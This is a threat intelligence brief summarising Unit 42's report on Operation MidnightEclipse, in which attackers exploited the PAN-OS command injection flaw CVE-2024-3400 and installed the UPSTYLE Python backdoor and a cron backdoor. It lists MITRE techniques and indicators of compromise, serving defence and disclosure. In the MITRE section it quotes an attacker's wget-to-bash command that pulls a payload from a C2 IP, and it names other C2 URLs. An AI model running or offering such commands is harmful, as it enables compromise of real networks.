Threat Research

Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated April 29)

Securonix

Threat activity surrounding CVE-2024-3400 targets PAN-OS devices (GlobalProtect) with post-exploitation attempts. The operation, dubbed MidnightEclipse, includes a Python backdoor (UPSTYLE) and a cronbackdoor, with mitigations, indicators, and hunting guidance provided by Unit 42 and Palo Alto Networks. #MidnightEclipse #CVE-2024-3400 #UPSTYLE #GlobalProtect #PAN-OS #Volexity

Keypoints

  • CVE-2024-3400 is a critical PAN-OS command injection vulnerability that can allow an unauthenticated attacker to execute code with root privileges on affected firewalls.
  • The advisory covers patches and mitigations for PAN-OS 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3, plus later releases.
  • Unit 42 tracks exploitation activity under Operation MidnightEclipse, noting that most exploitation attempts failed and some attempts attempted to confirm vulnerability rather than fully compromise.
  • Post-exploitation activity observed includes a Python-based backdoor (UPSTYLE) and a cronjob backdoor used for receiving commands from an external server.
  • Exfiltration activity included copying running-config.xml to a web-accessible folder and transmitting it via HTTP requests to remote servers.
  • Indicators of compromise include specific IPs, domains, and file hashes (e.g., UPSTYLE hashes, C2 infrastructure, and hosted scripts).
  • Managed Threat Hunting queries and Threat IDs (95187, 95189, 95191) are provided to detect exploitation attempts and related activity.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – “A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.”
  • [T1059.004] Unix Shell – “the threat actor exploited CVE-2024-3400 to run commands on the firewall.”
  • [T1053.005] Cron – “cronjob backdoor to carry out their post-exploitation activities.”
  • [T1105] Ingress Tool Transfer – “update.py” backdoor hosted at 144.172.79[.]92 and related UPSTYLE deployment attempts.
  • [T1027.001] Obfuscated/Compressed Files – “Base64-decodes an embedded Python script and executes it.”
  • [T1567.002] Exfiltration Over Web Services – “copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files.”
  • [T1071.001] Web Protocols – “wget -qO- hxxp://172.233.228[.]93/patch|bash” and related HTTP-based command retrieval.
  • [T1059.006] Python – “Base64-decodes an embedded Python script and executes it” and the system.pth/payload flow.

Indicators of Compromise

  • [Hash] UPSTYLE Backdoor – 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078
  • [IP Address] C2 and download endpoints – 172.233.228.93, 66.235.168.222, and 144.172.79.92 (plus related threat IPs listed in the report)
  • [Domain] Hosted domain – nhdata.s3-us-west-2.amazonaws.com
  • [URL] Command and data exchange URLs – http://172.233.228.93/patch, http://172.233.228.93/policy, and update.py hosted at 144.172.79.92/update.py
  • [Filename] Backdoor and payload artifacts – system.pth, bootstrap.min.css, sslvpn_ngx_error.log
  • [IP] Additional exploratory indicators – 110.47.250.103, 126.227.76.24, 38.207.148.123, 147.45.70.100, 199.119.206.28 (and related list of observed probing IPs)

Read more: https://unit42.paloaltonetworks.com/cve-2024-3400/#post-133365-_ydqdbjg0dngh

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint